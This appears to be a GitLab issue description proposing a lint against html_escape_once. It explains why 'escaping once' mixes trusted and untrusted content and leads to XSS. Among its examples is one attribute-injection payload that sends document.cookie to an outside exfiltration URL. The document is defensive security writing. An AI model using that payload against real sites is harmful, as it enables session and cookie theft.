Ratchet for use of html_escape_once/escape_once (in app and specs)
ERB::Util.html_escape_once is based on the fundamentally flawed idea that we can escape HTML "once". It sat at (or close to) the heart of many XSS vulnerabilities in our codebase, and while those uses have been removed, there are still some left, and more may be added in the future.
Accordingly, in Add lint against adding uses of html_escape_once (!216060), we're adding a lint to the codebase to stop the addition of new calls to this function, or its close cousin Banzai::Filter::Concerns::OutputSafety#escape_once.
Background
How many encoding- or escaping-adjacent functions do you know of that are irreversible? What about ones which irreversibly blur the lines between trusted and untrusted content?
CGI.escapeHTML replaces characters that could be recognised as comprising HTML tags or character references (aka "entities") with character references that represent those characters. In other words, < might be seen as the start of a tag, so we replace it with the character entity reference <, which represents the character < in a text node or attribute value without it being possibly parsed as anything but text.
It also replaces >, " and ' with >, " and ' respectively. These are all essential in ensuring that we can drop a value into a tag’s attribute value without unexpected meaning switches. <img alt=funny>? Not so funny if the alt text is user-supplied and they choose the value ><script>window.location.href='https://66.66.66.66/exfil?'+document.cookie</script>.
Importantly, it will also replace & with &, otherwise there would be no way to actually write the text < on the page without it turning into a <. We write &lt; in HTML to get that text.
Sometimes we cobble together input text from various sources, occasionally mixing text sources (like a plain <input type="text">) and HTML sources (such as from a WYSIWYG editor's innerHTML). If a user writes 1 < 2 in both of these places, we'd get the string 1 < 2 from the <input> and 1 < 2 from the WYSIWYG editor. If we want to put both of these into the same DOM element, how do we do it?
The correct solution is to escape the first input, but not the second. Now they're both HTML, we sanitise them both, and can put them in the document.
Unfortunately, sometimes it's too late to treat them separately: we've mixed them into the one place. Escaping it all means we'll get 1 < 2 for the first (which will correctly display in HTML as the text 1 < 2), but 1 &lt; 2 for the second (which will display in HTML as the text 1 < 2 — ugly!).
html_escape_once attempts to be a bandaid for this situation. It works like CGI.escapeHTML, except it won't escape anything that already looks like a character entity reference. It'll turn < into <, but it won't turn e.g. < into &lt; — it'll leave it. In this situation, it happens to do the right thing.
The problem is, this is an irreversible process — we can never safely unescape this content again, because any character references that were already in the input weren't touched. This can quickly become an XSS vector, especially when these functions are used in HTML tag attribute values: if we store HTML in attributes (and we do), "escape once" is equivalent to unescaped! The documents <a title="<xss>"> and <a title="<xss>"> are indistinguishable from a DOM point of view. This is scary but very true!
Note further the way this corrupts user input: if a user enters text like Let's add an <input> here in a text field (because they're a web developer, say), html_escape_once will turn that into Let's add an <input> here. That's OK — it will render faithfully to their intent. But if they enter What about using "<" here? because they're talking about HTML entities, it won't touch the entity, and will render as What about using "<" here?. We don't need to be corrupting user input this way! Using CGI.escapeHTML here gives us the correct answer.
What's the root of this problem?
Let's analyse the meaning of these functions; not the how, but the what:
-
escapeHTML: take some text and render it into HTML in such a way that it represents the same value when encountered in a text node or attribute.- I have the text
100 > 50. I want the HTML equivalent of this. I put it throughescapeHTML. I get100 > 50. That's HTML, and if I put that into a tag, that tag will contain a text node with the content100 > 50. Perfect.
- I have the text
-
unescapeHTML: take some HTML as encountered in the source body of a text node or attribute, and render it into text in such a way that it represents the same value.- I read the HTML
<p>100 > 50</p>. I want the textual content of this, and for Reasons™, I have to do it without an HTML parser. I strip tags and I'm left with100 > 50. I run that throughunescapeHTML, and I get100 > 50. Passable.
- I read the HTML
These functions are complimentary, and indeed, unescapeHTML(escapeHTML(x)) will always equal x.
(It's really important to note, however, that escapeHTML(unescapeHTML(x)) will very often not equal x, with security-catastrophic consequences. I address this toward the end.)
But first, let's try to describe the "what" of html_escape_once. What would that be like?
Take some .. text? Well, no, not really — it might contain entities, the whole point of the _once bit is we don't want to touch entities, so we're conceding it might not just be text. We want those entities to represent their value.
Take some HTML? Well, uh, no, we're explicitly trying not to do that. If there's HTML tags in there, we want them escaped!
Take some text-ish HTML and render it into HTML in such a way that whatever looked like HTML is treated like text but things that look like HTML entities are treated like entities, in such a way that it represents, uh. Something.
This is a problem, and the reason is in the messiness of this definition. When do we have text-ish HTML? Hopefully never. We can never consistently treat it as one or the other. If we html_escape_once some text-ish HTML, we've turned it into "just HTML" (albeit HTML that will almost certainly represent something illegible at some point), but we can never, ever unescape it again. Why? We've mixed text and HTML into the same "trust level".
Text in its unadulterated "text" form is something we can handle safely. We can store it in a database field, knowing it faithfully represents some input exactly as intended. We can put it in a text node in the DOM. We can escape it and put it in HTML, although hopefully our framework is doing this for us.
Importantly, if we do escape it into HTML ourselves, we know the resulting HTML is also trusted, and safe for display. The user-controlled portion has been neutralised. We could write, say, <b>#{escapeHTML(user_text_input)}</b> into a .erb file, and we know that if they typed Add <input>, when we open that view, we should see those very letters Add <input> in bold, with no surprise textboxes.
On the other hand, if we receive HTML from the client, it is not trusted. Even if it's meant to come from our own editor, there's nothing stopping the user sending us <script>blahBlah.megaEvil()</script> anyway, and mixing that into our output without the appropriate steps is a recipe for an instant XSS.
(Sanitising doesn't fix this part, either. We might not want a user to be able to drop an actual unordered list in the middle of a milestone title, but does that mean if a user types <ul> in there, it should disappear? No: they should see the text <ul>! It's a text field, not an HTML entry field. Right? We need to decide!)
We can say that escapeHTML encodes text as HTML, preserving the level of trust while changing the acceptable context for the value. The corollary is that unescapeHTML decodes HTML into text (though it only preserves the level of trust inasmuch as you originally encoded it as HTML to begin with; see below).
html_escape_once encodes text as HTML, preserving the level of trust, except for entities in the original text, which are left untouched, and migrate a level of trust “upwards”. The output is of mixed trust, in a single string. Here be dragons.
Diagrammatic tl;dr
Here's what happens when we're just escaping and unescaping HTML:
The "it's really important to note" from earlier comes in here: you can't unescape content that you didn't first escape yourself. If you do, here be dragons: note the dashed red line. Once you pass it, you're stuck on the other side, with mixed trust levels. User input has become indistinguishable from the system HTML. We really want to avoid getting stuck on the other side of the dashed line.
Here's what this diagram looks like with html_escape_once added to the picture:
This is why it's such a problem. It either (a) does nothing, OR, (b) it ruins your week. If your week was already ruined — if your content is already mixed, and this is why it seems like you have to use it — address the problem at its root. Unmix the content, and then treat user input separately to keep it safe (and known). Using CGI.escapeHTML can help you safely find those sources of mixing by making it obvious — you'll start seeing entities on the page! This is the hard work involved in getting our application XSS-free.
Thanks for reading!
References
Prior work referencing the idea that I want to do this, or motivating that we need to do this to prevent relapses:
- Clearly delineate text and HTML in Banzai, and ... (!207397 - merged)
- Compose HTML consistently in Banzai reference f... (!208270 - merged)
- https://gitlab.com/gitlab-org/security/gitlab/-/merge_requests/2275+
- Fix accidental promotion of label content to HT... (!211696 - merged)
- Stop unescaping HTML in BaseLabel#title=, #desc... (!207594 - merged)

